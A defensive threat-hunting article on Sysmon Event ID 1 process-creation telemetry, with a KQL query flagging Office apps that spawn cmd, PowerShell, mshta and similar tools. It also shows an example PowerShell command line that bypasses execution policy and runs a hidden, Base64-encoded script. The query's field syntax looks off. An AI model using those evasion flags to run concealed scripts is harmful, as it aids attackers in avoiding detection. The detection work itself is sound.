System Monitor (Sysmon) Event ID 1 intercepts kernel-level process creation routines to expose the exact command-line arguments, cryptographic hashes, and parent-child execution lineages of every executable launched on a Windows endpoint. Threat hunters query this high-fidelity telemetry to detect “Living off the Land” (LotL) techniques, fileless malware execution, and malicious payload staging that routinely bypass standard signature-based prevention mechanisms.
Sysmon Architecture and Kernel Interception
Sysmon operates via a dual-component architecture: a kernel-mode device driver (SysmonDrv.sys) and a user-mode background service (Sysmon.exe). To capture Event ID 1 (Process Creation), the driver registers a callback function with the Windows kernel utilizing the PsSetCreateProcessNotifyRoutineEx API.
When the Windows kernel allocates a new _EPROCESS object to execute a binary, it pauses execution and triggers the Sysmon callback. The kernel passes the physical path of the executable, the user-supplied command-line string, and the Process ID (PID) of the parent process directly to the driver. The Sysmon driver immediately calculates the cryptographic hash (MD5, SHA-256, or IMPHASH) of the physical file on disk before any user-mode code executes, neutralizing rootkits that attempt to spoof image paths in user-space.
The driver transmits this gathered context to the user-mode Sysmon service via Advanced Local Procedure Calls (ALPC). The service formats the data into structured XML and publishes it through Event Tracing for Windows (ETW), committing the record to the Microsoft-Windows-Sysmon/Operational event log.
Querying Event ID 1 for Execution Anomalies
Security analysts hunt for anomalies within Event ID 1 by correlating the Image (the executing process) against its ParentImage (the process that spawned it) and inspecting the CommandLine for obfuscation or unauthorized arguments.
Adversaries frequently exploit macro-enabled Office documents to spawn secondary command interpreters. A legitimate instance of winword.exe rarely invokes powershell.exe or cmd.exe. By querying the SIEM for this specific parent-child relationship, hunters isolate initial access vectors and macro-based dropper executions.
While raw event querying enables deep forensic pivots, mature Security Operations Centers abstract these detection patterns into generalized, engine-agnostic rulesets, a methodology detailed in Threat Hunting: Using Sigma, YARA, and UBA.
Security engineers utilize query languages like Kusto Query Language (KQL) in Microsoft Sentinel or SPL in Splunk to continuously evaluate Sysmon Event ID 1 telemetry. The following KQL script detects Office productivity applications spawning administrative command shells:
kusto
// KQL Query: Detect Suspicious Process Lineage from Microsoft Office
Event
| where Source == "Microsoft-Windows-Sysmon" and EventID == 1
// Parse the XML payload into queryable dynamic fields
| extend EventData = parse_xml(EventData)
| extend ParentImage = tostring(EventData.DataItem.EventData.Data.[17])
| extend Image = tostring(EventData.DataItem.EventData.Data.[4])
| extend CommandLine = tostring(EventData.DataItem.EventData.Data.[10])
// Define the anomalous parent-child conditions
| where ParentImage has_any ("winword.exe", "excel.exe", "powerpnt.exe")
| where Image has_any ("cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe")
| project TimeGenerated, Computer, ParentImage, Image, CommandLine
| sort by TimeGenerated desc
Beyond parent-child relationships, hunters scrutinize the CommandLine field for encoded payloads. Threat actors utilize parameters like powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand <Base64_String> to execute fileless scripts directly in memory. Querying Event ID 1 for combinations of these execution flags instantly highlights attempted evasion tactics.
Additional Reading
https://learn.microsoft.com/en-us/sysinternals/downloads/sysmonhttps://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntddk/nf-ntddk-pssetcreateprocessnotifyroutineex